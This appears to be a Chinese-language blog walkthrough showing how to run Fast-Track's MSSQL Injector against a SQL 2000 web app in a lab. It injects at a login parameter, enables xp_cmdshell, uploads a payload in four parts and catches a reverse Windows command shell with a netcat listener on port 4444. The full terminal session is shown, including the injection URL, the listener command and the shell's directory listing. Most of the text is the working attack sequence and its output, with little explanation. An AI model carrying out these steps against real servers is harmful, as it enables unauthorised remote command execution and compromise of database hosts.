MSSQL2K - SQL Injector - Query String Parameter Attack结合netcat获得反向cmdshell

fasttrack操作:

root@bt:~# cd /pentest/exploits/fasttrack/
root@bt:/pentest/exploits/fasttrack# ./fast-track.py -i
***********************************************
******* Performing dependency checks... *******
***********************************************

*** FreeTDS and PYMMSQL are installed. (Check) ***
*** PExpect is installed. (Check) ***
*** ClientForm is installed. (Check) ***
*** Psyco is installed. (Check) ***
*** Beautiful Soup is installed. (Check) ***

Also ensure ProFTP, WinEXE, and SQLite3 is installed from
the Updates/Installation menu.

Your system has all requirements needed to run Fast-Track!
 *****************************************************************
 **                                                             **
 **  Fast-Track - A new beginning...                            **
 **  Version: 4.0.2                                             **
 **  Written by: David Kennedy (ReL1K)                          **
 **  Lead Developer: Joey Furr (j0fer)                          **
 **  http://www.secmaniac.com                                   **
 **                                                             **
 *****************************************************************

Fast-Track Main Menu:

    1.  Fast-Track Updates
    2.  Autopwn Automation
    3.  Nmap Scripting Engine
    4.  Microsoft SQL Tools
    5.  Mass Client-Side Attack
    6.  Exploits
    7.  Binary to Hex Payload Converter
    8.  Payload Generator
    9.  Fast-Track Tutorials
    10. Fast-Track Changelog
    11. Fast-Track Credits
    12. Exit Fast-Track

    Enter the number: 4

 *****************************************************************
 **                                                             **
 **  Fast-Track - A new beginning...                            **
 **  Version: 4.0.2                                             **
 **  Written by: David Kennedy (ReL1K)                          **
 **  Lead Developer: Joey Furr (j0fer)                          **
 **  http://www.secmaniac.com                                   **
 **                                                             **
 *****************************************************************

Microsoft SQL Attack Tools

    1. MSSQL Injector
    2. MSSQL Bruter
    3. SQLPwnage

    (q)uit

    Enter your choice : 1

 *****************************************************************
 **                                                             **
 **  Fast-Track - A new beginning...                            **
 **  Version: 4.0.2                                             **
 **  Written by: David Kennedy (ReL1K)                          **
 **  Lead Developer: Joey Furr (j0fer)                          **
 **  http://www.secmaniac.com                                   **
 **                                                             **
 *****************************************************************

Enter which SQL Injector you want to use:

    1. SQL Injector - Query String Parameter Attack
    2. SQL Injector - POST Parameter Attack
    3. SQL Injector - GET FTP Payload Attack
    4. SQL Injector - GET Manual Setup Binary Payload Attack

    (q)uit

    Enter your choice: 1
 *****************************************************************
 **                                                             **
 **  Fast-Track - A new beginning...                            **
 **  Version: 4.0.2                                             **
 **  Written by: David Kennedy (ReL1K)                          **
 **  Lead Developer: Joey Furr (j0fer)                          **
 **  http://www.secmaniac.com                                   **
 **                                                             **
 *****************************************************************


    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    Requirements: PExpect
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    This module uses a reverse shell by using the binary2hex method for uploading.
    It does not require FTP or any other service, instead we are using the debug
    function in Windows to generate the executable.

    You will need to designate where in the URL the SQL Injection is by using 'INJECTHERE

    So for example, when the tool asks you for the SQL Injectable URL, type:

    http://www.thisisafakesite.com/blah.aspx?id='INJECTHERE&password=blah
             

    Enter the URL of the susceptible site, remember to put 'INJECTHERE for the injectible parameter

    Example:http://www.thisisafakesite.com/blah.aspx?id='INJECTHERE&password=blah

    <ctrl>-c to exit to Main Menu...

    Enter here: http://192.168.1.109:8080/mssql2k/login?username='INJECTHERE
/pentest/exploits/fasttrack/bin/ftsrc/sqlbinarypayload.py:74: DeprecationWarning: os.popen2 is deprecated.  Use the subprocess module.
  ncstarter=os.popen2('xterm -geometry 60x20 -bg black -fg green -fn *-fixed-*-*-*-20-* -T "Fast-Track Binary Payload SQL Injector" -e nc -lvp 4444 2> /dev/null')
    Sending initial request to enable xp_cmdshell if disabled....
    Sending first portion of payload (1/4)....
    Sending second portion of payload (2/4)....
    Sending third portion of payload (3/4)...
    Sending the last portion of the payload (4/4)...
    Running cleanup before executing the payload...
    Running the payload on the server...
     You should have a shell if everything went good..Might take a couple seconds

另外起一个bash,来运行nc:

root@bt:~# nc -l -p 4444

当fasttrack出现:

    Running the payload on the server...

时,nc就连上了:

root@bt:~# nc -l -p 4444
Microsoft Windows XP [版本 5.1.2600]
(C) 版权所有 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>cd ..
cd ..

C:\WINDOWS>cd ..
cd ..

C:\>dir
dir
 驱动器 C 中的卷没有标签。
 卷的序列号是 3052-FA52

 C:\ 的目录

2012-03-24  11:55                 0 AUTOEXEC.BAT
2012-03-24  11:55                 0 CONFIG.SYS
2012-03-24  11:59    <DIR>          Documents and Settings
2013-07-02  21:45    <DIR>          msf3
2012-08-07  03:10       176,204,554 msf3.zip
2004-12-29  13:07            61,440 nc.exe
2013-07-01  22:45    <DIR>          Program Files
2013-05-01  22:15        16,232,448 python-2.7.4.msi
2013-07-06  17:57    <DIR>          Python27
2013-04-07  21:03        70,402,968 SQL2000SP4.exe
2013-06-30  21:58    <DIR>          SQL2KSP4
2013-06-30  21:53    <DIR>          SQLEVAL
2011-03-22  17:38       349,280,992 sqleval.exe
2013-07-01  20:52    <DIR>          WINDOWS
2013-05-22  20:55        20,868,704 Wireshark-win32-1.8.7.exe
               8 个文件    633,051,106 字节
               7 个目录  3,919,802,368 可用字节

C:\>exit
exit
root@bt:~# 


你可能感兴趣的:(MSSQL2K - SQL Injector - Query String Parameter Attack结合netcat获得反向cmdshell)